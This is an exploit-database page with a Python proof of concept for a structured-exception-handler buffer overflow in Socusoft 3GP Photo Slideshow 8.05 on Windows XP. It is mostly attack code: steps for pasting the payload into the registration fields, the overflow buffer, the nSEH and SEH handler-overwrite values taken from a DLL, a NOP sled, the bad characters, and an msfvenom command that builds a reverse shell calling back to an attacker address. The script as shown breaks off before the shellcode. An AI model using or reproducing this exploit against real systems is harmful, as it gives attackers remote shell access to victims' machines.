Exploits / Vulnerability Discovered : 2018-09-10 |
Type : local |
Platform : windows_x86
This exploit / vulnerability Socusoft 3gp photo slideshow 8.05 buffer overflow (seh) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Socusoft 3GP Photo Slideshow 8.05 - Buffer Overflow (SEH)
# Date: 2018-09-08
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Software Link:http://www.dvd-photo-slideshow.com/3gp-photo-slideshow.html
# Tested Version: 8.05
# Tested on OS: Windows XP Service Pack 3 x86
# Steps to Reproduce:
# 1. Run the python exploit script, it will create a new file with the name "exploit.txt".
# 2. Just copy the text inside "exploit.txt".
# 3. Start the program. In the new window click "Help" > "Register ...
# 4. Now paste the content of "exploit.txt" into the field:"Registration Name" + "Regestration Key". Click "Apply" > "Ok"
# You will see a sweet reverse shell poped up in your attacker box.
buffer = "A" * (512)
# 0x10030b2d : pop ebx # pop ecx # ret | ascii {PAGE_EXECUTE_READ} [DVDPhotoData.dll]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.5.0 (
# C:\Program Files\Socusoft\Socusoft 3GP Photo Slideshow\DVDPhotoData.dll)
nseh = "\xeb\x06\x90\x90"
seh = "\x2d\x0b\x03\x10"
nops = "\x90" * 18
#Badchar \x00\x0a\x0d
#sudo msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.0.2.5 LPORT=1337 -b '\x00\x0a\x0d' -f python